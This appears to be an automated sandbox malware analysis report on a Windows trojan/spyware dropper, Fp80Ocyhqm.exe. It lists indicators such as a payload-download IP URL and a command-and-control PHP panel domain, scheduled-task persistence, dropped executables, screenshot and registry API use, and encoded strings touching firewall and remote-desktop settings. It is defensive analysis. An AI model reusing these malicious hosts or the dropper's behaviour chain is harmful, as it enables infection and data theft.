Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.59.120.8/files/dinnmamunms/cubrodriver.exe
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.59.120.8/files/dinnmamunms/cubrodriver.exe0a73
Source: Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.59.120.8/files/dinnmamunms/cubrodriver.exe;
Source: Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.59.120.8/files/dinnmamunms/cubrodriver.exeb
Source: Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.59.120.8/files/dinnmamunms/cubrodriver.exekwr.xyz
Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA2562021CA1.crt0
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, cubrodriver.exe, 00000005.00000002.1446823242.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Gxtuum.exe, 00000001.00000002.3779688440.000000000093F000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpF
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpH
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpI
Source: Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpSA1
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpeK
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpekjlfnvtgpegkwr.xyz
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpekjlfnvtgpegkwr.xyz5
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpf
Source: Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpheR
Source: Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpqA_
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, cubrodriver.exe, 00000005.00000002.1446823242.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, cubrodriver.exe, 00000005.00000002.1446823242.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA2562021CA1.crl0S
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, cubrodriver.exe, 00000005.00000002.1446823242.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Gxtuum.exe.0.dr, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA2562021CA1.crl0
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, cubrodriver.exe, 00000005.00000002.1446823242.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, cubrodriver.exe, 00000005.00000002.1446823242.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, cubrodriver.exe, 00000005.00000002.1446823242.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, cubrodriver.exe, 00000005.00000002.1446823242.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, cubrodriver.exe, 00000005.00000002.1446823242.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.dr	String found in binary or memory: https://sectigo.com/CPS0

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe

Code function: 0_2_000661F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,

0_2_000661F0

System Summary

PE file contains section with special chars

Source: cubrodriver[1].exe.1.dr	Static PE information: section name:
Source: cubrodriver[1].exe.1.dr	Static PE information: section name: .idata
Source: cubrodriver[1].exe.1.dr	Static PE information: section name:
Source: cubrodriver.exe.1.dr	Static PE information: section name:
Source: cubrodriver.exe.1.dr	Static PE information: section name: .idata
Source: cubrodriver.exe.1.dr	Static PE information: section name:
Source: fvvb.exe.5.dr	Static PE information: section name:
Source: fvvb.exe.5.dr	Static PE information: section name: .idata
Source: fvvb.exe.5.dr	Static PE information: section name:

Source: C:\ProgramData\giab\fvvb.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	File created: C:\Windows\Tasks\Gxtuum.job			Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	File created: C:\Windows\Tasks\Test Task17.job			Jump to behavior

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_000661F0	0_2_000661F0
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_000A40E7	0_2_000A40E7
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_0009C77D	0_2_0009C77D
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_00092CC0	0_2_00092CC0
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_00064EF0	0_2_00064EF0
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_0009CF09	0_2_0009CF09
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_000651A0	0_2_000651A0
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_00065450	0_2_00065450
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_0008B560	0_2_0008B560
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_0008F77B	0_2_0008F77B
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_000A1977	0_2_000A1977
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_000A5D74	0_2_000A5D74
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_000A5E94	0_2_000A5E94
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_004161F0	1_2_004161F0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_0041B700	1_2_0041B700
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_004540E7	1_2_004540E7
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_00442CC0	1_2_00442CC0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_00414EF0	1_2_00414EF0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_0044CF09	1_2_0044CF09
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_004151A0	1_2_004151A0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_00415450	1_2_00415450
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_0043B560	1_2_0043B560
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_0043F77B	1_2_0043F77B
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_00455D74	1_2_00455D74
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_00455E94	1_2_00455E94
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_004540E7	3_2_004540E7
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_004161F0	3_2_004161F0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_0044C77D	3_2_0044C77D
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_00442CC0	3_2_00442CC0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_00414EF0	3_2_00414EF0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_0044CF09	3_2_0044CF09
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_004151A0	3_2_004151A0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_00415450	3_2_00415450
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_0043B560	3_2_0043B560
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_0043F77B	3_2_0043F77B
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_00451977	3_2_00451977
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_00455D74	3_2_00455D74
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_00455E94	3_2_00455E94

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe B1663D4497DDD27A59F090B72ADCEDDDAC51724A1C126F7D6469F8045D065E15

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: String function: 00083FF0 appears 136 times
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: String function: 0008A610 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: String function: 004484EC appears 34 times
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: String function: 004161F0 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: String function: 00433FF0 appears 272 times
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: String function: 004330E0 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: String function: 004424D8 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: String function: 00439DC3 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: String function: 0043A610 appears 112 times

Source: Fp80Ocyhqm.exe

Static PE information: invalid certificate

Source: Fp80Ocyhqm.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: cubrodriver[1].exe.1.dr	Static PE information: Section: yuxfscdw ZLIB complexity 0.9944930111069277
Source: cubrodriver.exe.1.dr	Static PE information: Section: yuxfscdw ZLIB complexity 0.9944930111069277
Source: fvvb.exe.5.dr	Static PE information: Section: yuxfscdw ZLIB complexity 0.9944930111069277

Source: cubrodriver.exe.1.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: fvvb.exe.5.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: cubrodriver[1].exe.1.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@12/7@2/3

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe

Code function: 1_2_0041E8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,

1_2_0041E8D0

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe

File created: C:\Users\user\AppData\Roaming\10000840100\

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Mutant created: \Sessions\1\BaseNamedObjects\bf11e9eb444cca0553e5dc41fdf05974
Source: C:\ProgramData\giab\fvvb.exe	Mutant created: \Sessions\1\BaseNamedObjects\Test Task17

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe

File created: C:\Users\user\AppData\Local\Temp\a58456755d

Jump to behavior

Source: Fp80Ocyhqm.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Fp80Ocyhqm.exe	Virustotal: Detection: 79%
Source: Fp80Ocyhqm.exe	ReversingLabs: Detection: 81%

Source: Fp80Ocyhqm.exe	String found in binary or memory: " /add /y
Source: Fp80Ocyhqm.exe	String found in binary or memory: " /add
Source: Gxtuum.exe	String found in binary or memory: " /add
Source: Gxtuum.exe	String found in binary or memory: " /add /y
Source: Gxtuum.exe	String found in binary or memory: " /add
Source: Gxtuum.exe	String found in binary or memory: " /add /y
Source: cubrodriver.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: fvvb.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: Fp80Ocyhqm.exe	String found in binary or memory: " /add /y
Source: Fp80Ocyhqm.exe	String found in binary or memory: " /add
Source: Fp80Ocyhqm.exe	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe

File read: C:\Users\user\Desktop\Fp80Ocyhqm.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Fp80Ocyhqm.exe "C:\Users\user\Desktop\Fp80Ocyhqm.exe"
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Process created: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe "C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe"
Source: unknown	Process created: C:\ProgramData\giab\fvvb.exe C:\ProgramData\giab\fvvb.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Process created: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe "C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Section loaded: ntmarta.dll	Jump to behavior
